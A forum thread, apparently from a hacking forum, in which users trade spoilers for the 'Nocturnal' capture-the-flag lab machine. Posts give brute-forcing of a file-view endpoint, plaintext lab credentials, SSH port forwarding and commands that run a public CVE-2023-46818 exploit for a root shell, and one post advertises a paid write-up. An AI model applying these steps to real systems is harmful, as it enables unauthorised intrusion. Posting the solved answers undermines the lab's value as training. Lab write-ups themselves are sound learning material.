Posts: 33
Threads: 1
Joined: Oct 2024
Apr 12, 2025, 09:16 PM
(This post was last modified: Apr 12, 2025, 09:18 PM by samuelballsiu1.)
(Apr 12, 2025, 09:12 PM)hujson Wrote: (Apr 12, 2025, 08:59 PM)samuelballsiu1 Wrote: (Apr 12, 2025, 08:53 PM)hujson Wrote: (Apr 12, 2025, 08:10 PM)maggi Wrote: (Apr 12, 2025, 07:35 PM)kkkgrukckhko Wrote: We can use this syntax to check our uploads:
nocturnal.htb/view.php?username=amanda&file=privacy.odt
but i doesnt make my revshell work idk why, any suggest?
log into site as Amanda
Download backup
Dump the DB
ssh as that user
check local ports for interesting things
how to download the sql dump I'm geting a 403.
Login as amanda:arHkG7HAI68X8s1J
Create backup with the password arHkG7HAI68X8s1J
and unzip with the same password arHkG7HAI68X8s1J
Thanks it worked. But how did you find the creds for that account?
find the privacy.odt file in amanda's files with bruteforcing the username at the /view.php endpoint. After you've done that you can unzip the .odt file and grep for "pass" to find the password for that account
Posts: 2
Threads: 0
Joined: Jan 2025
after download privacy.odt then unzip it contains file with passwd for amanda
Posts: 2
Threads: 0
Joined: Feb 2025
lost on root.
found service running on the box.
also found possible exploit but it need valid creds .
and i cannot find the creds
Posts: 6
Threads: 0
Joined: Jan 2025
(Apr 12, 2025, 10:02 PM)alwaysphenom2 Wrote: lost on root.
found service running on the box.
also found possible exploit but it need valid creds .
and i cannot find the creds
the creds are default admin username "admin" and reused pass of tobias
Posts: 13
Threads: 0
Joined: Jan 2024
Easy root:
That's it! Pwned. Enjoy
Posts: 12
Threads: 1
Joined: Mar 2025
I have the same problem, did you solve it?
(Apr 12, 2025, 08:46 PM)samuelballsiu1 Wrote: Anyone knows what to do, to get root, after logged in through ssh as tobias?
Posts: 1
Threads: 0
Joined: Apr 2025
I don't know if you could share a step-by-step guide on how you obtained the flags.
Posts: 9
Threads: 3
Joined: Feb 2025
here mate:
nocturnal.htb/view.php?username=amanda&file=privacy.odt
there u can see this message:
Dear Amanda,
Nocturnal has set the following temporary password for you: arHkG7HAI68X8s1J. This password has been set for all our services, so it is essential that you change it on your first login to ensure the security of your account and our infrastructure.
The file has been created and provided by Nocturnal's IT team. If you have any questions or need additional assistance during the password change process, please do not hesitate to contact us.
Remember that maintaining the security of your credentials is paramount to protecting your information and that of the company. We appreciate your prompt attention to this matter.
Yours sincerely,
Nocturnal's IT team
Posts: 216
Threads: 42
Joined: Nov 2024
I have shared quick user and root, not for free this time as i need some credits ?
If you don't have credits dm will share.
https://breachforums.rs/Thread-Nocturnal...r-and-root
Posts: 1
Threads: 0
Joined: Apr 2025
(Apr 12, 2025, 11:25 PM)machakilos Wrote: here so u dont have to pay : Tobias Credentials (needed for further steps):
tobias lowmotionapocalypse
1. Do port forwarding of the 8080 port of the machine to your local machine with SSH:
ssh -L 9999:127.0.0.1:8080 tobias@nocturnal.htb
2. Read user flag:
cat usert.txt
3. On your local machine clone the following repo and exploit the vulnerability:
$ git clone https://github.com/bipbopbup/CVE-2023-46...xploit.git
$ cd CVE-2023-46818-python-exploit
$ python3 exploit.py http://127.0.0.1:9999/ admin slowmotionapocalypse
4. The exploit will provide you with a root shell into the machine, then you can read the root.txt flag:
cat /root/root.txt
yo machakilos, could you explain why 127.0.0.1 is used instead of the ip addr of the box?
|
